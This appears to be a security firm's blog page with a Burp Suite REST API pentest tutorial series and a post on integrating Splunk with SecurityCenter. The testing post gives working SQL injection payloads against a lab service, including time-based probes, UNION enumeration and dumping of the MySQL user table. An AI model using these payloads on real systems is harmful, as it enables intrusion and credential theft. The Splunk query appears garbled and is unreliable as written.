
MindPoint Group Blog


REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 3 – Reporting


Welcome back to the REST Assured blog series for Part 3: Reporting. While often overlooked by security professionals, report writing is almost always required of penetration testers once testing wraps up. That’s why today we’re going to review how to pull all of our findings together into a thorough paper trail.


Using Burp Suite, it’s relatively easy to generate dumps of all the tests that were performed using Intruder. Making them human-readable is another matter. In the Intruder window, select Save > Results Table. Burp Suite will generate a pop-up from which a number of options may be chosen. Here are my recommended configurations based on the attacks we performed:

Due to the nature of how we tested, Burp Suite isn’t able to automatically associate an Intruder-based attack with a vulnerability and remediation strategy. So, unfortunately, it’s on us to parse the results manually and flag any anomalies worth including in a remediation strategy. To make the output file easy on the eyes, my recommendation is to use Microsoft Excel: create a new spreadsheet, go to Data > From Text/CSV, and choose the output file we just created. From there, Excel should start an import wizard; make sure you select “Edit” to verify the data has columns. Since some of our attacks include commas, we had to use tab as a delimiter. So, from the editing window, choose “Split Column,” make sure Tab is selected in the delimiter pull-down, and hit OK. If it looks okay, hit Close & Load. We should now have a workable table that includes every attack we performed except for the Repeater attacks, which I’ll get to in a minute.
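
If Excel isn’t handy, the same split-and-flag pass can be scripted. Here’s a minimal Python sketch; the column names (Request, Payload, Status) are assumptions based on a typical Intruder results export, so check them against your own file:

```python
import csv
import io

def load_intruder_results(tsv_text):
    """Parse a tab-delimited Burp Intruder results export into dicts.

    Assumes the first row is a header (e.g. Request, Payload, Status,
    Length), which matches a typical Results Table save.
    """
    reader = csv.DictReader(io.StringIO(tsv_text), delimiter="\t")
    return list(reader)

def flag_anomalies(rows):
    """Return attack rows (non-empty payload) that still got HTTP 200."""
    return [r for r in rows if r.get("Payload") and r.get("Status") == "200"]

# Tiny inline example; real data would be read from the saved file.
sample = "Request\tPayload\tStatus\tLength\n0\t\t200\t512\n1\t' OR '1'='1\t200\t2048\n"
rows = load_intruder_results(sample)
odd = flag_anomalies(rows)
```

The control request (no payload) is skipped, so `odd` only holds the suspicious rows worth a manual look.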

Next, we need to include the server’s responses to each of these attacks. This is where the throttling we configured in Part 1 of this blog series, when we set up Burp Suite to slow down its automated scans, pays off. Although it adds a lot more testing time, it is 100% required if we want our server response packets in an order that matches the Request # from our first set of attack data. To do this, from the Burp Suite Intruder window, select Save > Server Responses. Create a folder for the server responses and make sure “Concatenate to a single file” is NOT checked. You’ll see why in a second.

In Excel, go to the Data tab again > Get Data > From File > From Folder. Select the folder we just saved the responses to and click OK. Make sure to click Edit when the import preview appears. On the Content column header, click the button circled in red below.

In the pop-up, choose “Tab” from the delimiter pull-down, click OK, then Close & Load. From here you should have a workable data dump of every packet, which you can now sort by the “Name” column to match the Request # of the previous data set. So now we have an exhaustive, sortable spreadsheet of all the attacks we attempted in the Intruder scan.

Reporting on the Repeater testing we performed is super easy. All we need to do is select the body of the request inside Burp Suite, right-click > Save Item. It’s that easy. Make sure to uncheck “Base64-encode requests and responses,” as this will ensure the packets are human-readable. We’ll have to do this for each request of value that we used in the penetration test, but Burp Suite saves them as XML files that are relatively easy to parse and include everything in both the sent and received packets.
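
Those saved XML files can be parsed with nothing but the standard library. A sketch below, assuming the usual layout of a Burp “Save item” export (an <items> root with <item> children holding <url>, <request>, and <response> elements); verify the element names against your own export before relying on them:

```python
import xml.etree.ElementTree as ET

def parse_burp_items(xml_text):
    """Extract request/response pairs from a Burp 'Save item' XML export.

    Element names here reflect a typical export made with
    Base64 encoding unchecked, so the bodies are plain text.
    """
    root = ET.fromstring(xml_text)
    pairs = []
    for item in root.findall("item"):
        pairs.append({
            "url": item.findtext("url", default=""),
            "request": item.findtext("request", default=""),
            "response": item.findtext("response", default=""),
        })
    return pairs

# Illustrative export; the host/path are placeholders.
sample = """<items>
  <item>
    <url>http://dvws.local/api/users/1</url>
    <request base64="false">GET /api/users/1 HTTP/1.1</request>
    <response base64="false">HTTP/1.1 200 OK</response>
  </item>
</items>"""
pairs = parse_burp_items(sample)
```

Feeding every saved item through this gives you the same request/response pairs in a form you can drop straight into the report.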

That should be it as far as generating our paper trail! Everything is accounted for and documented in our testing.

Although we only really focused on conducting SQL injection testing, you can use this blog as a logical guide with other tests such as Cross-Site Scripting and Cross-Site Request Forgery.


In conclusion, I hope you enjoyed following along with this blog series and learning how to test RESTful API services, as more and more service providers keep promoting these interfaces. Personally, I think they’re wonderful, as they can extend so much functionality to the people who use them; however, as we just found out, testing them can require some extra steps. Feel free to comment on this blog or reach out to me on social media with any questions or comments! I really appreciate you taking the time to stop by and hopefully learn a thing or two about conducting your own, safe penetration tests on RESTful APIs using Burp Suite!


Categories: Application Security, Cyber Security, ISP Blog, Pen Test, Vulnerability Assessment, Vulnerability Management



REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 2 – Testing


Welcome back! In Part 1 of the REST Assured blog series, we discussed the definitions and history behind APIs, and we reviewed how to properly configure Burp Suite for conducting security testing against them. In Part 2, we’re getting into the fun part: testing.


Before we get into the testing, it’s important to be familiar with HTTP status codes so we can better understand how the server is handling our attack packets. Below is a subset of HTTP status codes from OWASP that can be used as a point of reference:

200 OK - Response to a successful REST API action. The HTTP method can be GET, POST, PUT, PATCH, or DELETE.
201 Created - The request has been fulfilled and the resource created. A URI for the created resource is returned in the Location header.
202 Accepted - The request has been accepted for processing, but processing is not yet complete.
400 Bad Request - The request is malformed, such as a message body format error.
401 Unauthorized - Wrong or no authentication ID/password provided.
403 Forbidden - Authentication succeeded, but the authenticated user doesn’t have permission to the requested resource.
404 Not Found - A non-existent resource was requested.
405 Method Not Allowed - The error for an unexpected HTTP method. For example, the REST API is expecting HTTP GET, but HTTP PUT is used.
406 Not Acceptable - The client presented a content type in the Accept header which is not supported by the server API.
413 Payload Too Large - Used to signal that the request size exceeded the given limit, e.g. regarding file uploads.
415 Unsupported Media Type - The requested content type is not supported by the REST service.
429 Too Many Requests - Used when a DoS attack may have been detected or the request was rejected due to rate limiting.
500 Internal Server Error - An unexpected condition prevented the server from fulfilling the request. Be aware that the response should not reveal internal information that helps an attacker, e.g. detailed error messages or stack traces.
501 Not Implemented - The REST service does not implement the requested operation yet.
503 Service Unavailable - The REST service is temporarily unable to process the request. Used to inform the client it should retry at a later time.


So, given this information, let’s take a look at some of my results and see if you can spot anything odd or unusual:

The very first request here (Request 0) is our control; there isn’t any modification to the original request, so it returned what we were expecting. However, if you look closely at the other attack packets, their statuses are all HTTP 200. If that truly is the case, then this application has a major problem with how it handles these attacks, as they shouldn’t be getting HTTP 200 statuses (they should be 400 at the API level, or 404 since we’re messing with the URL). Let’s take a closer look at some of these.

Yikes! This would be pretty bad to see in the real world. This type of error is generated by the database itself, MariaDB, which means that we have successfully touched the backend of the system through this interface. Now it’s just a matter of time until we’re able to get something other than errors. Also, now we understand why it’s returning HTTP 200: the API processed the request, but the backend SQL threw an error. Looking at the error message, it appears the “a” in the payload was consumed, since it doesn’t appear in the response, which makes me believe the parameter we’re attacking is supposed to be an integer, not a character. It’s also possible the rest of the injection is breaking the backend requests, which is a good sign for us as attackers. Let’s look at an attack that starts with an integer.

Well, there you have it. The whole table was dumped. We knew ahead of time that this particular service was vulnerable to this attack though, so let’s look at some other findings that would serve as a more practical test:

For this attack we tried to inject a “sleep” command, which just tells the database to wait a set number of seconds; however, we’re not 100% sure what happened. The database didn’t throw an error, but it didn’t return anything either. This result is a common example of a finding that requires follow-up. I turned on the columns that show us the response time to give us an idea. Based on the response time, I don’t believe we successfully injected a sleep statement, but if we right-click this attack, we can forward it to Repeater to make our own changes and dig deeper into what is happening.

Here you can see the response time of our request is 13 milliseconds (bottom right of response), so the command isn’t taking, but it’s not throwing errors. Let’s try messing with some things:

In the request above, we can see that our encoded characters are getting translated in the response. We’ve also learned through the error messages that this database is running MariaDB. Let’s include the integer value for the user ID before our attack this time and see what happens:

Bingo. We successfully got the MariaDB server to execute the command “SLEEP(5)” and we verified it in the response time it took (5 seconds) on the bottom right of the response. The SLEEP command is an extremely common way of testing for Blind SQL Injection due to the somewhat Boolean response from the server itself. The sleep timer either worked or it didn’t. The successful execution of the “SLEEP” command can enable us to gain more information about the database’s syntax and get a deeper understanding of what is happening behind the curtain. Let’s pretend we didn’t dump the table already and take this a step further now that we’ve succeeded in injecting commands and see how far the rabbit hole goes.
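
That measure-and-compare check is easy to automate once you have it working in Repeater. A sketch of the timing logic below, with the actual HTTP call stubbed out so it runs standalone; the one-second sleep (shortened from the five seconds used above), threshold, and stub functions are all illustrative, not from the original test:

```python
import time

SLEEP_SECONDS = 1              # shortened from SLEEP(5) so the demo is quick
THRESHOLD = SLEEP_SECONDS * 0.8  # allow a little slack for network jitter

def looks_time_blind(send_request, payload):
    """Time one request and report whether it ran long enough to suggest
    the injected SLEEP executed. send_request is any callable that
    performs the HTTP request (e.g. a wrapper around requests.get)."""
    start = time.monotonic()
    send_request(payload)
    elapsed = time.monotonic() - start
    return elapsed >= THRESHOLD

# Simulated backends so the flow is demonstrable without a live target:
def fake_vulnerable(payload):
    if "SLEEP" in payload.upper():
        time.sleep(SLEEP_SECONDS)  # mimics the database honoring the injection

def fake_patched(payload):
    pass  # ignores the injection entirely

vulnerable = looks_time_blind(fake_vulnerable, "1 AND SLEEP(1)")
patched = looks_time_blind(fake_patched, "1 AND SLEEP(1)")
```

The same either-it-slept-or-it-didn’t comparison is what makes the SLEEP technique behave like a Boolean oracle.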

So, we did a couple of things here. The first thing we did is add “1=2” after the AND, which basically modifies the original query to not return anything (it’s returning false). The false statement is important because we want to count how many columns the query is selecting by injecting our own “UNION SELECT” command. Here we start with a single “NULL” value. Notice in the response that the database is saying that’s not the right number of columns selected. Let’s keep adding NULL values until we get something that takes (assuming we didn’t already know a valid query returns two columns).
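
That column-counting loop is mechanical enough to generate up front. A short sketch producing the candidate probes; the `1 AND 1=2` prefix mirrors the false-statement trick above, while the parameter value itself is illustrative:

```python
def union_probe_payloads(max_columns=5, prefix="1 AND 1=2"):
    """Generate UNION SELECT probes with 1..max_columns NULL columns.

    Send each probe in turn; the first one that stops producing a
    column-count error reveals how many columns the query selects.
    """
    payloads = []
    for n in range(1, max_columns + 1):
        nulls = ",".join(["NULL"] * n)
        payloads.append(f"{prefix} UNION SELECT {nulls}")
    return payloads

probes = union_probe_payloads(3)
# probes[1] is "1 AND 1=2 UNION SELECT NULL,NULL"
```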

Okay, so now we know we have the correct number of columns selected for this specific query. Once we have the correct format for our commands, we can use this as a blueprint for some nastier things, such as:

Ah-ha! Success! By adding @@version in place of a NULL value, we’re able to increase our understanding of the database itself. Moving forward:

Using @@datadir, we can determine this is a Windows-hosted database due to the file structure. The host operating system can be useful for later attacks if we ever try to grab any system files or folders (if this were Linux, we could later try to grab /etc/passwd, for example). Let’s check on the account that the database itself is using to give us an idea of its privileges.

That’s convenient. Looks like a stock root account (a default setup for DVWS which explains the insecurities in this configuration). Now for my favorite part, stealing account credentials!

Above we modified the UNION SELECT command to select users and their passwords from “mysql.user,” which is where the user account information is stored. You’ll notice in this test instance, the account passwords (listed in the “last_name” fields) are blank, which is due to the stock setup of DVWS. If this were a live or test system, we would (hopefully) be seeing the hashes of their passwords there. With that information we could conduct offline brute forcing or use a rainbow table to crack the hashes. There are a number of existing tools to assist with cracking the hashes (hashcat, John the Ripper, etc.), but we’ll leave that to a future discussion. Next up, let’s look at the list of databases:

You can see here that we’re continuing to modify the values we’re selecting; in this case we selected “schema_name” from “information_schema.schemata.” This returns a list of all the databases running on the server: dvws, information_schema, mysql, performance_schema, phpMyAdmin, and test. Now, going deeper, let’s investigate the columns for each of these:
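
The whole enumeration sequence follows one template: keep the two-column UNION and swap in whatever you want to read. Collected as data, it looks something like the sketch below; the `1 AND 1=2` prefix is illustrative, and current_user() is one common way to read the account (the walkthrough doesn’t show the exact function it used), so treat these strings as assumptions to adapt:

```python
# Two-column UNION probes used once the column count is known.
# MySQL/MariaDB-specific: @@version, @@datadir, mysql.user, and
# information_schema.schemata all appear in the walkthrough above.
ENUM_PAYLOADS = {
    "db_version":  "1 AND 1=2 UNION SELECT @@version, NULL",
    "data_dir":    "1 AND 1=2 UNION SELECT @@datadir, NULL",
    "db_account":  "1 AND 1=2 UNION SELECT current_user(), NULL",
    "credentials": "1 AND 1=2 UNION SELECT user, password FROM mysql.user",
    "databases":   ("1 AND 1=2 UNION SELECT schema_name, NULL "
                    "FROM information_schema.schemata"),
}

def payload_for(goal):
    """Look up the probe for a given enumeration goal."""
    return ENUM_PAYLOADS[goal]
```

Keeping the probes as data like this also makes the eventual report easier to assemble: each finding maps cleanly back to the exact payload that produced it.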

It’s possible to extend this command to continue cleaning up the type of information shown here, but you can see where we’re going. We can continue to modify this attack, one request at a time, until we’re able to dump everything from each database we have access to. Once we learned this was a MySQL-compatible server, we could use that knowledge to guide our modifications to the attack query, targeting its syntax and structure. I’m fairly confident that we could even modify this query to do things like dump every database and its contents to a file and then return it to us, considering we already determined we can execute privileged commands. Dumping the contents to a file could give us, as attackers, plenty of time to go over the content if we were worried about generating excess logs or if time were of the essence. I think this is a safe place to end our SQL injection testing, since we’ve pretty much proved we can do anything we want with the MySQL server.

What’s Next?

This will conclude Part 2: Testing of the REST Assured blog series. Stay tuned for Part 3 on reporting where we’ll learn how to put everything together into manageable data sets and wrap up this series.


Categories: Application Security, Cyber Security, Pen Test, Vulnerability Assessment, Vulnerability Management



A Tale Of Two Tools: When Splunk met SecurityCenter


Co-Authors:  Keith Rhea and Alex Nanthavong

It was the best of times, it was the worst of times, it was the age of technological advancements, it was the age of attack, it was the epoch of cybercrime, it was the epoch of opportunity, it was the season of Remediation, it was the season of Exploitation, it was the spring of Security, it was the winter of Vulnerability. We had targets and queries before us, with the data all going direct to SecurityCenter, while the queries were all staying in Splunk — in short, the race between attackers’ access to exploits and defenders’ ability to assess, remediate and mitigate them remained a never-ending cycle. The usefulness and identification of new vulnerabilities could no longer rely on either tool operating independently of each other. When Splunk met SecurityCenter, the alerts of outstanding vulnerabilities were received for remediation before compromise and helped to stay ahead of exploitation.[1]

With the integration of security tools, vulnerability management programs can improve the security posture of cloud environments. Tenable Research published a study that measured the difference in time between when an exploit for a vulnerability becomes publicly available (Time to Exploit Availability (TtEA)) and when a vulnerability is first assessed (Time to Assess (TtA)). The delta, negative or positive, indicates the window of opportunity (or lack thereof) for an attacker to exploit an unknown vulnerability. The researchers used a sample set based on the 50 most prevalent vulnerabilities from nearly 200,000 unique vulnerability assessment scans over a 3-month period in late 2017. Their findings, summarized below, indicate that attackers have a significant advantage over defenders.
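
In concrete terms, the delta is just TtA minus TtEA. A toy illustration with made-up dates (not figures from the Tenable study):

```python
from datetime import date

def exposure_window_days(exploit_available, first_assessed):
    """TtA - TtEA in days. A positive result is the head start the
    attacker had: an exploit existed before the defender's first scan."""
    return (first_assessed - exploit_available).days

# Hypothetical vulnerability: exploit published Jan 3, first assessed Jan 10.
delta = exposure_window_days(date(2018, 1, 3), date(2018, 1, 10))
# delta == 7: a seven-day window in the attacker's favor
```

Flip the dates and the delta goes negative, meaning the defender assessed the vulnerability before a public exploit existed, which is the position the integrations below aim to make routine.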

As migration to the cloud and adoption of cloud business models increase, cloud assets are constantly being introduced to and retired from those environments. Traditional forms of asset tracking are woefully inefficient in highly dynamic cloud environments, and this extends to traditional vulnerability management systems and techniques as well. To improve the TtA, continuous vulnerability assessments can be implemented. However, that alone is not enough to fully mitigate the nightmare of performing effective vulnerability management in these rapidly changing environments. Analysis of vulnerability scanning behavior indicates that just over 25 percent of organizations are conducting vulnerability assessments with a frequency of two days or fewer. Contrary to popular belief, a successful vulnerability management program includes more than just a snapshot-in-time scan of an environment. While point-in-time scanning is an achievable first step for most organizations, and will reduce the head start that attackers have for most vulnerabilities, it still leaves a negative delta and exposure gap for many vulnerabilities. The impact of this exposure gap can be significant depending on the vulnerabilities in question. Shortening the window between scans and moving towards continuous or near real-time vulnerability scanning will have the most positive impact on the TtEA vs. TtA time delta.

Not only should regular scanning occur, but there also needs to be careful analysis of the identified vulnerabilities to determine their associated risks, dependent on any compensating controls available in the environment. This analysis provides the basis for determining remediation timeframes. Everyone agrees that vulnerability management is a necessary function of an effective security practice; in our experience, however, this is not enough to combat the speed at which attackers move. We advocate for organizations to shorten the vulnerability scan cycle time as much as possible, while also improving upon traditional, static asset tracking by gathering data dynamically from sources like cloud infrastructure APIs and CMDBs. As Dickens says, as if he were a Security Officer, “Nothing that we do, is done in vain. I believe, with all my soul, that we shall see triumph.”[2]

Achieving Better TtA via Integration of Splunk and SecurityCenter

MindPoint Group security engineers were able to enhance all phases of their vulnerability management program by integrating Splunk and Tenable SecurityCenter. This integration allows the team to gather asset data via the cloud infrastructure API and correlate that data with near real-time vulnerability data. The team is now able to adapt and react more quickly to the rapidly evolving threat landscape in highly dynamic operating environments. The correlation and analysis of vulnerabilities within a highly dynamic cloud environment is made possible by using SecurityCenter to scan, consolidate, and evaluate vulnerability scans across the organization, and Splunk to aggregate vulnerability data, asset data, and other sources of events and log data from various components of a large cloud environment. With all these sources of data ingested in real time into the Splunk environment, reports and alerts can now be generated to provide in-depth, on-demand vulnerability data to address potential threats as they are discovered.

So How Does it Work?

Security tooling is important, and having tools configured and operating correctly is an important first step for a security team. The effectiveness of individual security tools is greatly reduced when they operate independently of each other, and many security teams greatly increase their effectiveness by working to integrate existing tools, processes, and data sources instead of buying yet another tool. The diagram above illustrates the vulnerability management process and the components needed to integrate SecurityCenter and Splunk. This integration is important because it gives security teams the ability to move beyond the old standards and methods of periodic vulnerability scanning. Integrating these two tools provides security teams with an enhanced view of their data for improved aggregation, searching, and reporting capabilities. An enhanced vulnerability management approach based on an agile, API-driven, DevSecOps model is necessary to decrease the TtA for vulnerabilities and ultimately shorten the time delta for defenders. Each tool plays a crucial role in the overall integration and enables security teams to have more actionable information to ensure timely remediation.

Once scan data, cloud asset data, and other data sources have been fed into Splunk, we are able to use the following query:

index=tenable* (
    [ search index=tenable!=*DEAD*!=*Security* (* OR*)
    | rename as ScanName
    | convert num(scan_result_info.finishTime) as time
    | eval finish=strftime(time, "%Y-%m-%d %H:%M:%S")
    | dedup ScanName
    | table ScanName finish
    | return 15])
    | lookup aws-instances.csv private_ip_address as ip
    | search tags.ApplicationID=* accountName=* tags.op_env=*
    | stats count

From within Splunk we are then able to produce reports, alerts, and dashboards to provide development, operations, and security teams with in-depth, on-demand vulnerability data to address potential threats as they are discovered. Alerts can be customized so that they are generated using the remediation and prioritization criteria mandated by an organization.
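
One way to wire up such an alert is a scheduled saved search. Below is a sketch of a savedsearches.conf stanza; the stanza name, index, severity field, and email address are all placeholders, and the keys should be checked against the savedsearches.conf reference for your Splunk version:

```ini
[Critical Vuln Alert - placeholder]
# Run hourly against the Tenable index (index and field names assumed)
search = index=tenable* severity=critical | stats count by ip, pluginName
cron_schedule = 0 * * * *
enableSched = 1
dispatch.earliest_time = -1h
# Fire whenever any results come back, and notify the team by email
counttype = number of events
relation = greater than
quantity = 0
action.email = 1
action.email.to = secops@example.com
```

The trigger criteria (counttype/relation/quantity) are where an organization’s own remediation and prioritization rules get encoded, per the customization described above.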

Once security teams are continuously alerted and armed with vulnerability data, they are better able to align operational processes to support rapid response and ad hoc remediation and mitigation requests outside of regular maintenance and patch windows. Those efforts for targeted remediation and prioritization can be better focused on vulnerabilities with publicly available exploits and those actively being targeted by malware, exploit kits and ransomware.

This enables up-to-date situational awareness and threat context to evaluate true risk and exposure as well as to inform and guide decision making. By leveraging the integration of Tenable, Splunk, and AWS, vulnerability, configuration, and asset data can be used to conduct deep security analysis, and achieve the awareness, perspective and information needed to make effective security decisions.


[1] Dickens, C. (1867). A Tale of two cities, and Great expectations (Diamond ed.). Ticknor and Fields, Book 1, Chapter 1: The Period

[2] Dickens, C. (1867). A Tale of two cities, and Great expectations (Diamond ed.). Ticknor and Fields, Book 2, Chapter 16: Still Knitting

Quantifying the Attacker’s First-Mover Advantage. (2018, May 24). Retrieved June 1, 2018, from

Categories: Architecture and Engineering, Cloud, Configuration Management, Cyber Security, Engineering and Architecture, ISP Blog, Qualitative Analysis, Quantitative Analysis, Risk Assessment, Risk Management, Vulnerability Assessment, Vulnerability Management